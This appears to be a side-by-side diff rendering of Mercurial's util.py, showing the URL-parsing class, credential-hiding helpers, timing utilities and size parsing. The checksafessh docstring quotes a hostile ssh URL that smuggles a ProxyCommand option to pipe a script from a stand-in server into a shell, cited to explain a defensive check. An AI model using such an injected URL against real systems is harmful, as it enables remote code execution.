2976 fragment, which is set to '' if present but empty.
2987 fragment, which is set to '' if present but empty.
2977
2988
2978 If parsefragment is False, fragment is included in query. If
2989 If parsefragment is False, fragment is included in query. If
2979 parsequery is False, query is included in path. If both are
2990 parsequery is False, query is included in path. If both are
2980 False, both fragment and query are included in path.
2991 False, both fragment and query are included in path.
2981
2992
2982 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2993 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983
2994
2984 Note that for backward compatibility reasons, bundle URLs do not
2995 Note that for backward compatibility reasons, bundle URLs do not
2985 take host names. That means 'bundle://../' has a path of '../'.
2996 take host names. That means 'bundle://../' has a path of '../'.
2986
2997
2987 Examples:
2998 Examples:
2988
2999
2989 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
3000 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
3001 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 >>> url(b'ssh://[::1]:2200//home/joe/repo')
3002 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
3003 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 >>> url(b'file:///home/joe/repo')
3004 >>> url(b'file:///home/joe/repo')
2994 <url scheme: 'file', path: '/home/joe/repo'>
3005 <url scheme: 'file', path: '/home/joe/repo'>
2995 >>> url(b'file:///c:/temp/foo/')
3006 >>> url(b'file:///c:/temp/foo/')
2996 <url scheme: 'file', path: 'c:/temp/foo/'>
3007 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 >>> url(b'bundle:foo')
3008 >>> url(b'bundle:foo')
2998 <url scheme: 'bundle', path: 'foo'>
3009 <url scheme: 'bundle', path: 'foo'>
2999 >>> url(b'bundle://../foo')
3010 >>> url(b'bundle://../foo')
3000 <url scheme: 'bundle', path: '../foo'>
3011 <url scheme: 'bundle', path: '../foo'>
3001 >>> url(br'c:\foo\bar')
3012 >>> url(br'c:\foo\bar')
3002 <url path: 'c:\\foo\\bar'>
3013 <url path: 'c:\\foo\\bar'>
3003 >>> url(br'\\blah\blah\blah')
3014 >>> url(br'\\blah\blah\blah')
3004 <url path: '\\\\blah\\blah\\blah'>
3015 <url path: '\\\\blah\\blah\\blah'>
3005 >>> url(br'\\blah\blah\blah#baz')
3016 >>> url(br'\\blah\blah\blah#baz')
3006 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3017 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 >>> url(br'file:///C:\users\me')
3018 >>> url(br'file:///C:\users\me')
3008 <url scheme: 'file', path: 'C:\\users\\me'>
3019 <url scheme: 'file', path: 'C:\\users\\me'>
3009
3020
3010 Authentication credentials:
3021 Authentication credentials:
3011
3022
3012 >>> url(b'ssh://joe:xyz@x/repo')
3023 >>> url(b'ssh://joe:xyz@x/repo')
3013 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3024 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 >>> url(b'ssh://joe@x/repo')
3025 >>> url(b'ssh://joe@x/repo')
3015 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3026 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016
3027
3017 Query strings and fragments:
3028 Query strings and fragments:
3018
3029
3019 >>> url(b'http://host/a?b#c')
3030 >>> url(b'http://host/a?b#c')
3020 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3031 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3032 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3033 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023
3034
3024 Empty path:
3035 Empty path:
3025
3036
3026 >>> url(b'')
3037 >>> url(b'')
3027 <url path: ''>
3038 <url path: ''>
3028 >>> url(b'#a')
3039 >>> url(b'#a')
3029 <url path: '', fragment: 'a'>
3040 <url path: '', fragment: 'a'>
3030 >>> url(b'http://host/')
3041 >>> url(b'http://host/')
3031 <url scheme: 'http', host: 'host', path: ''>
3042 <url scheme: 'http', host: 'host', path: ''>
3032 >>> url(b'http://host/#a')
3043 >>> url(b'http://host/#a')
3033 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3044 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034
3045
3035 Only scheme:
3046 Only scheme:
3036
3047
3037 >>> url(b'http:')
3048 >>> url(b'http:')
3038 <url scheme: 'http'>
3049 <url scheme: 'http'>
3039 """
3050 """
3040
3051
3041 _safechars = b"!~*'()+"
3052 _safechars = b"!~*'()+"
3042 _safepchars = b"/!~*'()+:\\"
3053 _safepchars = b"/!~*'()+:\\"
3043 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3054 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044
3055
3045 def __init__(self, path, parsequery=True, parsefragment=True):
3056 def __init__(self, path, parsequery=True, parsefragment=True):
3046 # type: (bytes, bool, bool) -> None
3057 # type: (bytes, bool, bool) -> None
3047 # We slowly chomp away at path until we have only the path left
3058 # We slowly chomp away at path until we have only the path left
3048 self.scheme = self.user = self.passwd = self.host = None
3059 self.scheme = self.user = self.passwd = self.host = None
3049 self.port = self.path = self.query = self.fragment = None
3060 self.port = self.path = self.query = self.fragment = None
3050 self._localpath = True
3061 self._localpath = True
3051 self._hostport = b''
3062 self._hostport = b''
3052 self._origpath = path
3063 self._origpath = path
3053
3064
3054 if parsefragment and b'#' in path:
3065 if parsefragment and b'#' in path:
3055 path, self.fragment = path.split(b'#', 1)
3066 path, self.fragment = path.split(b'#', 1)
3056
3067
3057 # special case for Windows drive letters and UNC paths
3068 # special case for Windows drive letters and UNC paths
3058 if hasdriveletter(path) or path.startswith(b'\\\\'):
3069 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 self.path = path
3070 self.path = path
3060 return
3071 return
3061
3072
3062 # For compatibility reasons, we can't handle bundle paths as
3073 # For compatibility reasons, we can't handle bundle paths as
3063 # normal URLS
3074 # normal URLS
3064 if path.startswith(b'bundle:'):
3075 if path.startswith(b'bundle:'):
3065 self.scheme = b'bundle'
3076 self.scheme = b'bundle'
3066 path = path[7:]
3077 path = path[7:]
3067 if path.startswith(b'//'):
3078 if path.startswith(b'//'):
3068 path = path[2:]
3079 path = path[2:]
3069 self.path = path
3080 self.path = path
3070 return
3081 return
3071
3082
3072 if self._matchscheme(path):
3083 if self._matchscheme(path):
3073 parts = path.split(b':', 1)
3084 parts = path.split(b':', 1)
3074 if parts[0]:
3085 if parts[0]:
3075 self.scheme, path = parts
3086 self.scheme, path = parts
3076 self._localpath = False
3087 self._localpath = False
3077
3088
3078 if not path:
3089 if not path:
3079 path = None
3090 path = None
3080 if self._localpath:
3091 if self._localpath:
3081 self.path = b''
3092 self.path = b''
3082 return
3093 return
3083 else:
3094 else:
3084 if self._localpath:
3095 if self._localpath:
3085 self.path = path
3096 self.path = path
3086 return
3097 return
3087
3098
3088 if parsequery and b'?' in path:
3099 if parsequery and b'?' in path:
3089 path, self.query = path.split(b'?', 1)
3100 path, self.query = path.split(b'?', 1)
3090 if not path:
3101 if not path:
3091 path = None
3102 path = None
3092 if not self.query:
3103 if not self.query:
3093 self.query = None
3104 self.query = None
3094
3105
3095 # // is required to specify a host/authority
3106 # // is required to specify a host/authority
3096 if path and path.startswith(b'//'):
3107 if path and path.startswith(b'//'):
3097 parts = path[2:].split(b'/', 1)
3108 parts = path[2:].split(b'/', 1)
3098 if len(parts) > 1:
3109 if len(parts) > 1:
3099 self.host, path = parts
3110 self.host, path = parts
3100 else:
3111 else:
3101 self.host = parts[0]
3112 self.host = parts[0]
3102 path = None
3113 path = None
3103 if not self.host:
3114 if not self.host:
3104 self.host = None
3115 self.host = None
3105 # path of file:///d is /d
3116 # path of file:///d is /d
3106 # path of file:///d:/ is d:/, not /d:/
3117 # path of file:///d:/ is d:/, not /d:/
3107 if path and not hasdriveletter(path):
3118 if path and not hasdriveletter(path):
3108 path = b'/' + path
3119 path = b'/' + path
3109
3120
3110 if self.host and b'@' in self.host:
3121 if self.host and b'@' in self.host:
3111 self.user, self.host = self.host.rsplit(b'@', 1)
3122 self.user, self.host = self.host.rsplit(b'@', 1)
3112 if b':' in self.user:
3123 if b':' in self.user:
3113 self.user, self.passwd = self.user.split(b':', 1)
3124 self.user, self.passwd = self.user.split(b':', 1)
3114 if not self.host:
3125 if not self.host:
3115 self.host = None
3126 self.host = None
3116
3127
3117 # Don't split on colons in IPv6 addresses without ports
3128 # Don't split on colons in IPv6 addresses without ports
3118 if (
3129 if (
3119 self.host
3130 self.host
3120 and b':' in self.host
3131 and b':' in self.host
3121 and not (
3132 and not (
3122 self.host.startswith(b'[') and self.host.endswith(b']')
3133 self.host.startswith(b'[') and self.host.endswith(b']')
3123 )
3134 )
3124 ):
3135 ):
3125 self._hostport = self.host
3136 self._hostport = self.host
3126 self.host, self.port = self.host.rsplit(b':', 1)
3137 self.host, self.port = self.host.rsplit(b':', 1)
3127 if not self.host:
3138 if not self.host:
3128 self.host = None
3139 self.host = None
3129
3140
3130 if (
3141 if (
3131 self.host
3142 self.host
3132 and self.scheme == b'file'
3143 and self.scheme == b'file'
3133 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3144 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 ):
3145 ):
3135 raise error.Abort(
3146 raise error.Abort(
3136 _(b'file:// URLs can only refer to localhost')
3147 _(b'file:// URLs can only refer to localhost')
3137 )
3148 )
3138
3149
3139 self.path = path
3150 self.path = path
3140
3151
3141 # leave the query string escaped
3152 # leave the query string escaped
3142 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3153 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 v = getattr(self, a)
3154 v = getattr(self, a)
3144 if v is not None:
3155 if v is not None:
3145 setattr(self, a, urlreq.unquote(v))
3156 setattr(self, a, urlreq.unquote(v))
3146
3157
3147 def copy(self):
3158 def copy(self):
3148 u = url(b'temporary useless value')
3159 u = url(b'temporary useless value')
3149 u.path = self.path
3160 u.path = self.path
3150 u.scheme = self.scheme
3161 u.scheme = self.scheme
3151 u.user = self.user
3162 u.user = self.user
3152 u.passwd = self.passwd
3163 u.passwd = self.passwd
3153 u.host = self.host
3164 u.host = self.host
3154 u.path = self.path
3165 u.path = self.path
3155 u.query = self.query
3166 u.query = self.query
3156 u.fragment = self.fragment
3167 u.fragment = self.fragment
3157 u._localpath = self._localpath
3168 u._localpath = self._localpath
3158 u._hostport = self._hostport
3169 u._hostport = self._hostport
3159 u._origpath = self._origpath
3170 u._origpath = self._origpath
3160 return u
3171 return u
3161
3172
3162 @encoding.strmethod
3173 @encoding.strmethod
3163 def __repr__(self):
3174 def __repr__(self):
3164 attrs = []
3175 attrs = []
3165 for a in (
3176 for a in (
3166 b'scheme',
3177 b'scheme',
3167 b'user',
3178 b'user',
3168 b'passwd',
3179 b'passwd',
3169 b'host',
3180 b'host',
3170 b'port',
3181 b'port',
3171 b'path',
3182 b'path',
3172 b'query',
3183 b'query',
3173 b'fragment',
3184 b'fragment',
3174 ):
3185 ):
3175 v = getattr(self, a)
3186 v = getattr(self, a)
3176 if v is not None:
3187 if v is not None:
3177 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3188 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3178 return b'<url %s>' % b', '.join(attrs)
3189 return b'<url %s>' % b', '.join(attrs)
3179
3190
3180 def __bytes__(self):
3191 def __bytes__(self):
3181 r"""Join the URL's components back into a URL string.
3192 r"""Join the URL's components back into a URL string.
3182
3193
3183 Examples:
3194 Examples:
3184
3195
3185 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3196 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3186 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3197 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3187 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3198 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3188 'http://user:pw@host:80/?foo=bar&baz=42'
3199 'http://user:pw@host:80/?foo=bar&baz=42'
3189 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3200 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3190 'http://user:pw@host:80/?foo=bar%3dbaz'
3201 'http://user:pw@host:80/?foo=bar%3dbaz'
3191 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3202 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3192 'ssh://user:pw@[::1]:2200//home/joe#'
3203 'ssh://user:pw@[::1]:2200//home/joe#'
3193 >>> bytes(url(b'http://localhost:80//'))
3204 >>> bytes(url(b'http://localhost:80//'))
3194 'http://localhost:80//'
3205 'http://localhost:80//'
3195 >>> bytes(url(b'http://localhost:80/'))
3206 >>> bytes(url(b'http://localhost:80/'))
3196 'http://localhost:80/'
3207 'http://localhost:80/'
3197 >>> bytes(url(b'http://localhost:80'))
3208 >>> bytes(url(b'http://localhost:80'))
3198 'http://localhost:80/'
3209 'http://localhost:80/'
3199 >>> bytes(url(b'bundle:foo'))
3210 >>> bytes(url(b'bundle:foo'))
3200 'bundle:foo'
3211 'bundle:foo'
3201 >>> bytes(url(b'bundle://../foo'))
3212 >>> bytes(url(b'bundle://../foo'))
3202 'bundle:../foo'
3213 'bundle:../foo'
3203 >>> bytes(url(b'path'))
3214 >>> bytes(url(b'path'))
3204 'path'
3215 'path'
3205 >>> bytes(url(b'file:///tmp/foo/bar'))
3216 >>> bytes(url(b'file:///tmp/foo/bar'))
3206 'file:///tmp/foo/bar'
3217 'file:///tmp/foo/bar'
3207 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3218 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3208 'file:///c:/tmp/foo/bar'
3219 'file:///c:/tmp/foo/bar'
3209 >>> print(url(br'bundle:foo\bar'))
3220 >>> print(url(br'bundle:foo\bar'))
3210 bundle:foo\bar
3221 bundle:foo\bar
3211 >>> print(url(br'file:///D:\data\hg'))
3222 >>> print(url(br'file:///D:\data\hg'))
3212 file:///D:\data\hg
3223 file:///D:\data\hg
3213 """
3224 """
3214 if self._localpath:
3225 if self._localpath:
3215 s = self.path
3226 s = self.path
3216 if self.scheme == b'bundle':
3227 if self.scheme == b'bundle':
3217 s = b'bundle:' + s
3228 s = b'bundle:' + s
3218 if self.fragment:
3229 if self.fragment:
3219 s += b'#' + self.fragment
3230 s += b'#' + self.fragment
3220 return s
3231 return s
3221
3232
3222 s = self.scheme + b':'
3233 s = self.scheme + b':'
3223 if self.user or self.passwd or self.host:
3234 if self.user or self.passwd or self.host:
3224 s += b'//'
3235 s += b'//'
3225 elif self.scheme and (
3236 elif self.scheme and (
3226 not self.path
3237 not self.path
3227 or self.path.startswith(b'/')
3238 or self.path.startswith(b'/')
3228 or hasdriveletter(self.path)
3239 or hasdriveletter(self.path)
3229 ):
3240 ):
3230 s += b'//'
3241 s += b'//'
3231 if hasdriveletter(self.path):
3242 if hasdriveletter(self.path):
3232 s += b'/'
3243 s += b'/'
3233 if self.user:
3244 if self.user:
3234 s += urlreq.quote(self.user, safe=self._safechars)
3245 s += urlreq.quote(self.user, safe=self._safechars)
3235 if self.passwd:
3246 if self.passwd:
3236 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3247 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3237 if self.user or self.passwd:
3248 if self.user or self.passwd:
3238 s += b'@'
3249 s += b'@'
3239 if self.host:
3250 if self.host:
3240 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3251 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3241 s += urlreq.quote(self.host)
3252 s += urlreq.quote(self.host)
3242 else:
3253 else:
3243 s += self.host
3254 s += self.host
3244 if self.port:
3255 if self.port:
3245 s += b':' + urlreq.quote(self.port)
3256 s += b':' + urlreq.quote(self.port)
3246 if self.host:
3257 if self.host:
3247 s += b'/'
3258 s += b'/'
3248 if self.path:
3259 if self.path:
3249 # TODO: similar to the query string, we should not unescape the
3260 # TODO: similar to the query string, we should not unescape the
3250 # path when we store it, the path might contain '%2f' = '/',
3261 # path when we store it, the path might contain '%2f' = '/',
3251 # which we should *not* escape.
3262 # which we should *not* escape.
3252 s += urlreq.quote(self.path, safe=self._safepchars)
3263 s += urlreq.quote(self.path, safe=self._safepchars)
3253 if self.query:
3264 if self.query:
3254 # we store the query in escaped form.
3265 # we store the query in escaped form.
3255 s += b'?' + self.query
3266 s += b'?' + self.query
3256 if self.fragment is not None:
3267 if self.fragment is not None:
3257 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3268 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3258 return s
3269 return s
3259
3270
3260 __str__ = encoding.strmethod(__bytes__)
3271 __str__ = encoding.strmethod(__bytes__)
3261
3272
3262 def authinfo(self):
3273 def authinfo(self):
3263 user, passwd = self.user, self.passwd
3274 user, passwd = self.user, self.passwd
3264 try:
3275 try:
3265 self.user, self.passwd = None, None
3276 self.user, self.passwd = None, None
3266 s = bytes(self)
3277 s = bytes(self)
3267 finally:
3278 finally:
3268 self.user, self.passwd = user, passwd
3279 self.user, self.passwd = user, passwd
3269 if not self.user:
3280 if not self.user:
3270 return (s, None)
3281 return (s, None)
3271 # authinfo[1] is passed to urllib2 password manager, and its
3282 # authinfo[1] is passed to urllib2 password manager, and its
3272 # URIs must not contain credentials. The host is passed in the
3283 # URIs must not contain credentials. The host is passed in the
3273 # URIs list because Python < 2.4.3 uses only that to search for
3284 # URIs list because Python < 2.4.3 uses only that to search for
3274 # a password.
3285 # a password.
3275 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3286 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3276
3287
3277 def isabs(self):
3288 def isabs(self):
3278 if self.scheme and self.scheme != b'file':
3289 if self.scheme and self.scheme != b'file':
3279 return True # remote URL
3290 return True # remote URL
3280 if hasdriveletter(self.path):
3291 if hasdriveletter(self.path):
3281 return True # absolute for our purposes - can't be joined()
3292 return True # absolute for our purposes - can't be joined()
3282 if self.path.startswith(br'\\'):
3293 if self.path.startswith(br'\\'):
3283 return True # Windows UNC path
3294 return True # Windows UNC path
3284 if self.path.startswith(b'/'):
3295 if self.path.startswith(b'/'):
3285 return True # POSIX-style
3296 return True # POSIX-style
3286 return False
3297 return False
3287
3298
3288 def localpath(self):
3299 def localpath(self):
3289 # type: () -> bytes
3300 # type: () -> bytes
3290 if self.scheme == b'file' or self.scheme == b'bundle':
3301 if self.scheme == b'file' or self.scheme == b'bundle':
3291 path = self.path or b'/'
3302 path = self.path or b'/'
3292 # For Windows, we need to promote hosts containing drive
3303 # For Windows, we need to promote hosts containing drive
3293 # letters to paths with drive letters.
3304 # letters to paths with drive letters.
3294 if hasdriveletter(self._hostport):
3305 if hasdriveletter(self._hostport):
3295 path = self._hostport + b'/' + self.path
3306 path = self._hostport + b'/' + self.path
3296 elif (
3307 elif (
3297 self.host is not None and self.path and not hasdriveletter(path)
3308 self.host is not None and self.path and not hasdriveletter(path)
3298 ):
3309 ):
3299 path = b'/' + path
3310 path = b'/' + path
3300 return path
3311 return path
3301 return self._origpath
3312 return self._origpath
3302
3313
3303 def islocal(self):
3314 def islocal(self):
3304 '''whether localpath will return something that posixfile can open'''
3315 '''whether localpath will return something that posixfile can open'''
3305 return (
3316 return (
3306 not self.scheme
3317 not self.scheme
3307 or self.scheme == b'file'
3318 or self.scheme == b'file'
3308 or self.scheme == b'bundle'
3319 or self.scheme == b'bundle'
3309 )
3320 )
3310
3321
3311
3322
3312 def hasscheme(path):
3323 def hasscheme(path):
3313 # type: (bytes) -> bool
3324 # type: (bytes) -> bool
3314 return bool(url(path).scheme) # cast to help pytype
3325 return bool(url(path).scheme) # cast to help pytype
3315
3326
3316
3327
3317 def hasdriveletter(path):
3328 def hasdriveletter(path):
3318 # type: (bytes) -> bool
3329 # type: (bytes) -> bool
3319 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3330 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3320
3331
3321
3332
3322 def urllocalpath(path):
3333 def urllocalpath(path):
3323 # type: (bytes) -> bytes
3334 # type: (bytes) -> bytes
3324 return url(path, parsequery=False, parsefragment=False).localpath()
3335 return url(path, parsequery=False, parsefragment=False).localpath()
3325
3336
3326
3337
3327 def checksafessh(path):
3338 def checksafessh(path):
3328 # type: (bytes) -> None
3339 # type: (bytes) -> None
3329 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3340 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3330
3341
3331 This is a sanity check for ssh urls. ssh will parse the first item as
3342 This is a sanity check for ssh urls. ssh will parse the first item as
3332 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3343 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3333 Let's prevent these potentially exploited urls entirely and warn the
3344 Let's prevent these potentially exploited urls entirely and warn the
3334 user.
3345 user.
3335
3346
3336 Raises an error.Abort when the url is unsafe.
3347 Raises an error.Abort when the url is unsafe.
3337 """
3348 """
3338 path = urlreq.unquote(path)
3349 path = urlreq.unquote(path)
3339 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3350 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3340 raise error.Abort(
3351 raise error.Abort(
3341 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3352 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3342 )
3353 )
3343
3354
3344
3355
3345 def hidepassword(u):
3356 def hidepassword(u):
3346 # type: (bytes) -> bytes
3357 # type: (bytes) -> bytes
3347 '''hide user credential in a url string'''
3358 '''hide user credential in a url string'''
3348 u = url(u)
3359 u = url(u)
3349 if u.passwd:
3360 if u.passwd:
3350 u.passwd = b'***'
3361 u.passwd = b'***'
3351 return bytes(u)
3362 return bytes(u)
3352
3363
3353
3364
3354 def removeauth(u):
3365 def removeauth(u):
3355 # type: (bytes) -> bytes
3366 # type: (bytes) -> bytes
3356 '''remove all authentication information from a url string'''
3367 '''remove all authentication information from a url string'''
3357 u = url(u)
3368 u = url(u)
3358 u.user = u.passwd = None
3369 u.user = u.passwd = None
3359 return bytes(u)
3370 return bytes(u)
3360
3371
3361
3372
3362 timecount = unitcountfn(
3373 timecount = unitcountfn(
3363 (1, 1e3, _(b'%.0f s')),
3374 (1, 1e3, _(b'%.0f s')),
3364 (100, 1, _(b'%.1f s')),
3375 (100, 1, _(b'%.1f s')),
3365 (10, 1, _(b'%.2f s')),
3376 (10, 1, _(b'%.2f s')),
3366 (1, 1, _(b'%.3f s')),
3377 (1, 1, _(b'%.3f s')),
3367 (100, 0.001, _(b'%.1f ms')),
3378 (100, 0.001, _(b'%.1f ms')),
3368 (10, 0.001, _(b'%.2f ms')),
3379 (10, 0.001, _(b'%.2f ms')),
3369 (1, 0.001, _(b'%.3f ms')),
3380 (1, 0.001, _(b'%.3f ms')),
3370 (100, 0.000001, _(b'%.1f us')),
3381 (100, 0.000001, _(b'%.1f us')),
3371 (10, 0.000001, _(b'%.2f us')),
3382 (10, 0.000001, _(b'%.2f us')),
3372 (1, 0.000001, _(b'%.3f us')),
3383 (1, 0.000001, _(b'%.3f us')),
3373 (100, 0.000000001, _(b'%.1f ns')),
3384 (100, 0.000000001, _(b'%.1f ns')),
3374 (10, 0.000000001, _(b'%.2f ns')),
3385 (10, 0.000000001, _(b'%.2f ns')),
3375 (1, 0.000000001, _(b'%.3f ns')),
3386 (1, 0.000000001, _(b'%.3f ns')),
3376 )
3387 )
3377
3388
3378
3389
3379 @attr.s
3390 @attr.s
3380 class timedcmstats(object):
3391 class timedcmstats(object):
3381 """Stats information produced by the timedcm context manager on entering."""
3392 """Stats information produced by the timedcm context manager on entering."""
3382
3393
3383 # the starting value of the timer as a float (meaning and resulution is
3394 # the starting value of the timer as a float (meaning and resulution is
3384 # platform dependent, see util.timer)
3395 # platform dependent, see util.timer)
3385 start = attr.ib(default=attr.Factory(lambda: timer()))
3396 start = attr.ib(default=attr.Factory(lambda: timer()))
3386 # the number of seconds as a floating point value; starts at 0, updated when
3397 # the number of seconds as a floating point value; starts at 0, updated when
3387 # the context is exited.
3398 # the context is exited.
3388 elapsed = attr.ib(default=0)
3399 elapsed = attr.ib(default=0)
3389 # the number of nested timedcm context managers.
3400 # the number of nested timedcm context managers.
3390 level = attr.ib(default=1)
3401 level = attr.ib(default=1)
3391
3402
3392 def __bytes__(self):
3403 def __bytes__(self):
3393 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3404 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3394
3405
3395 __str__ = encoding.strmethod(__bytes__)
3406 __str__ = encoding.strmethod(__bytes__)
3396
3407
3397
3408
3398 @contextlib.contextmanager
3409 @contextlib.contextmanager
3399 def timedcm(whencefmt, *whenceargs):
3410 def timedcm(whencefmt, *whenceargs):
3400 """A context manager that produces timing information for a given context.
3411 """A context manager that produces timing information for a given context.
3401
3412
3402 On entering a timedcmstats instance is produced.
3413 On entering a timedcmstats instance is produced.
3403
3414
3404 This context manager is reentrant.
3415 This context manager is reentrant.
3405
3416
3406 """
3417 """
3407 # track nested context managers
3418 # track nested context managers
3408 timedcm._nested += 1
3419 timedcm._nested += 1
3409 timing_stats = timedcmstats(level=timedcm._nested)
3420 timing_stats = timedcmstats(level=timedcm._nested)
3410 try:
3421 try:
3411 with tracing.log(whencefmt, *whenceargs):
3422 with tracing.log(whencefmt, *whenceargs):
3412 yield timing_stats
3423 yield timing_stats
3413 finally:
3424 finally:
3414 timing_stats.elapsed = timer() - timing_stats.start
3425 timing_stats.elapsed = timer() - timing_stats.start
3415 timedcm._nested -= 1
3426 timedcm._nested -= 1
3416
3427
3417
3428
3418 timedcm._nested = 0
3429 timedcm._nested = 0
3419
3430
3420
3431
3421 def timed(func):
3432 def timed(func):
3422 """Report the execution time of a function call to stderr.
3433 """Report the execution time of a function call to stderr.
3423
3434
3424 During development, use as a decorator when you need to measure
3435 During development, use as a decorator when you need to measure
3425 the cost of a function, e.g. as follows:
3436 the cost of a function, e.g. as follows:
3426
3437
3427 @util.timed
3438 @util.timed
3428 def foo(a, b, c):
3439 def foo(a, b, c):
3429 pass
3440 pass
3430 """
3441 """
3431
3442
3432 def wrapper(*args, **kwargs):
3443 def wrapper(*args, **kwargs):
3433 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3444 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3434 result = func(*args, **kwargs)
3445 result = func(*args, **kwargs)
3435 stderr = procutil.stderr
3446 stderr = procutil.stderr
3436 stderr.write(
3447 stderr.write(
3437 b'%s%s: %s\n'
3448 b'%s%s: %s\n'
3438 % (
3449 % (
3439 b' ' * time_stats.level * 2,
3450 b' ' * time_stats.level * 2,
3440 pycompat.bytestr(func.__name__),
3451 pycompat.bytestr(func.__name__),
3441 time_stats,
3452 time_stats,
3442 )
3453 )
3443 )
3454 )
3444 return result
3455 return result
3445
3456
3446 return wrapper
3457 return wrapper
3447
3458
3448
3459
3449 _sizeunits = (
3460 _sizeunits = (
3450 (b'm', 2 ** 20),
3461 (b'm', 2 ** 20),
3451 (b'k', 2 ** 10),
3462 (b'k', 2 ** 10),
3452 (b'g', 2 ** 30),
3463 (b'g', 2 ** 30),
3453 (b'kb', 2 ** 10),
3464 (b'kb', 2 ** 10),
3454 (b'mb', 2 ** 20),
3465 (b'mb', 2 ** 20),
3455 (b'gb', 2 ** 30),
3466 (b'gb', 2 ** 30),
3456 (b'b', 1),
3467 (b'b', 1),
3457 )
3468 )
3458
3469
3459
3470
3460 def sizetoint(s):
3471 def sizetoint(s):
3461 # type: (bytes) -> int
3472 # type: (bytes) -> int
3462 """Convert a space specifier to a byte count.
3473 """Convert a space specifier to a byte count.
3463
3474
3464 >>> sizetoint(b'30')
3475 >>> sizetoint(b'30')
3465 30
3476 30
3466 >>> sizetoint(b'2.2kb')
3477 >>> sizetoint(b'2.2kb')
3467 2252
3478 2252
3468 >>> sizetoint(b'6M')
3479 >>> sizetoint(b'6M')
3469 6291456
3480 6291456
3470 """
3481 """
3471 t = s.strip().lower()
3482 t = s.strip().lower()
3472 try:
3483 try:
3473 for k, u in _sizeunits:
3484 for k, u in _sizeunits:
3474 if t.endswith(k):
3485 if t.endswith(k):
3475 return int(float(t[: -len(k)]) * u)
3486 return int(float(t[: -len(k)]) * u)
3476 return int(t)
3487 return int(t)
3477 except ValueError:
3488 except ValueError:
3478 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3489 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479
3490
3480
3491
3481 class hooks(object):
3492 class hooks(object):
3482 """A collection of hook functions that can be used to extend a
3493 """A collection of hook functions that can be used to extend a
3483 function's behavior. Hooks are called in lexicographic order,
3494 function's behavior. Hooks are called in lexicographic order,
3484 based on the names of their sources."""
3495 based on the names of their sources."""
3485
3496
3486 def __init__(self):
3497 def __init__(self):
3487 self._hooks = []
3498 self._hooks = []
3488
3499
